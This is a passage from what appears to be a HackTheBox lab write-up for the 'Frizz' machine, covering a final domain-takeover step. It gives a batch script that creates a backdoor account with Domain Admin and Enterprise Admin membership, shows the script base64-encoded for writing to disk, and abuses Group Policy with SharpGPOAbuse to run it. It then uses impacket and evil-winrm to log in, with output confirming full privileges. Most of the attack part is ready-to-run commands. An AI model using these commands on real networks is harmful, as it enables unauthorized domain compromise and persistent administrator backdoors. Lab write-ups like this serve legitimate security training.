bfa493772fde11d97703fcbf46dd5852

Bonkers

Instead of becoming admin I wanted to add a highest level administrator with Remote PS ability.

@echo off
set "username=letmein"
set "password=Password123$"
net user %username% %password% /add /domain
net group "Domain Admins" %username% /add /domain
net group "Enterprise Admins" %username% /add /domain
net localgroup Administrators %username% /add
net localgroup "Remote Management Users" %username% /add

Use base64 to write to file, since text editors don't exist for Windows (?)

[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("QGVjaG8gb2ZmCnNldCAidXNlcm5hbWU9bGV0bWVpbiIKc2V0ICJwYXNzd29yZD1QYXNzd29yZDEyMyQiCm5ldCB1c2VyICV1c2VybmFtZSUgJXBhc3N3b3JkJSAvYWRkIC9kb21haW4KbmV0IGdyb3VwICJEb21haW4gQWRtaW5zIiAldXNlcm5hbWUlIC9hZGQgL2RvbWFpbgpuZXQgZ3JvdXAgIkVudGVycHJpc2UgQWRtaW5zIiAldXNlcm5hbWUlIC9hZGQgL2RvbWFpbgpuZXQgbG9jYWxncm91cCBBZG1pbmlzdHJhdG9ycyAldXNlcm5hbWUlIC9hZGQKbmV0IGxvY2FsZ3JvdXAgIlJlbW90ZSBNYW5hZ2VtZW50IFVzZXJzIiAldXNlcm5hbWUlIC9hZGQ=")) | Out-File create_user.bat -Encoding "ASCII"

Note: For some god damn reason Out-File (or > redirection) use Unicode encoding by default... To avoid extra bytes use ASCII encoding.

Run the script

Remove-GPO Nothing2See
New-GPO "Nothing2See" | New-GPLink -Target "dc=frizz,dc=htb"
\Users\M.SchoolBus\Music\SharpGPOAbuse.exe --AddComputerTask --TaskName "Letmein" --Author FRIZZ.HTB\m.schoolbus --Command "cmd.exe" --Arguments "/c \Users\M.SchoolBus\Music\create_user.bat" --GPOName "Nothing2See" --Force
gpupdate /force
net user letmein

Remove-GPO Nothing2See; New-GPO "Nothing2See" | New-GPLink -Target "dc=frizz,dc=htb"; \Users\M.SchoolBus\Music\SharpGPOAbuse.exe --AddComputerTask --TaskName "Letmein" --Author FRIZZ.HTB\m.schoolbus --Command "cmd.exe" --Arguments "/c \Users\M.SchoolBus\Music\create_user.bat" --GPOName "Nothing2See" --Force; gpupdate /force; net user letmein

└─$ faketime -f +7h impacket-getTGT -dc-ip 'frizzdc.frizz.htb' 'frizz.htb'/'letmein':'Password123$' -k
└─$ export KRB5CCNAME=$(readlink -f ./letmein.ccache)
└─$ faketime -f +7h evil-winrm -i frizzdc.frizz.htb -r frizz.htb
*Evil-WinRM* PS C:\Users\letmein3\Documents> whoami /all
User Name      SID
============== ===============================================
frizz\letmein3 S-1-5-21-2386970044-1145388522-2932701813-11108

Group Name                                   Type             SID                                           Attributes
============================================ ================ ============================================= ===============================================================
Everyone                                     Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users              Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                       Alias            S-1-5-32-544                                  Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access   Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                         Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users             Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization               Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
frizz\Domain Admins                          Group            S-1-5-21-2386970044-1145388522-2932701813-512 Mandatory group, Enabled by default, Enabled group
frizz\Enterprise Admins                      Group            S-1-5-21-2386970044-1145388522-2932701813-519 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity   Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group
frizz\Denied RODC Password Replication Group Alias            S-1-5-21-2386970044-1145388522-2932701813-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level         Label            S-1-16-12288

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

PreviousHaze NextTitanic

Last updated 7 months ago

hashtagRecon

hashtagHTTP (80)

hashtagGibbon LMS

hashtagLFI

hashtagArbitrary File Write

hashtagReverse Shell (w.webservice)

hashtagHTTP (80) (Authenticated)

hashtagSMB

hashtagWinRM (f.frizzle)

hashtagUser.txt

hashtagWinRM (M.SchoolBus)

hashtagRecycle Bin

hashtagWAPT

hashtagPassword Reuse

hashtagShell

hashtagRoot.txt

hashtagBonkers

hashtag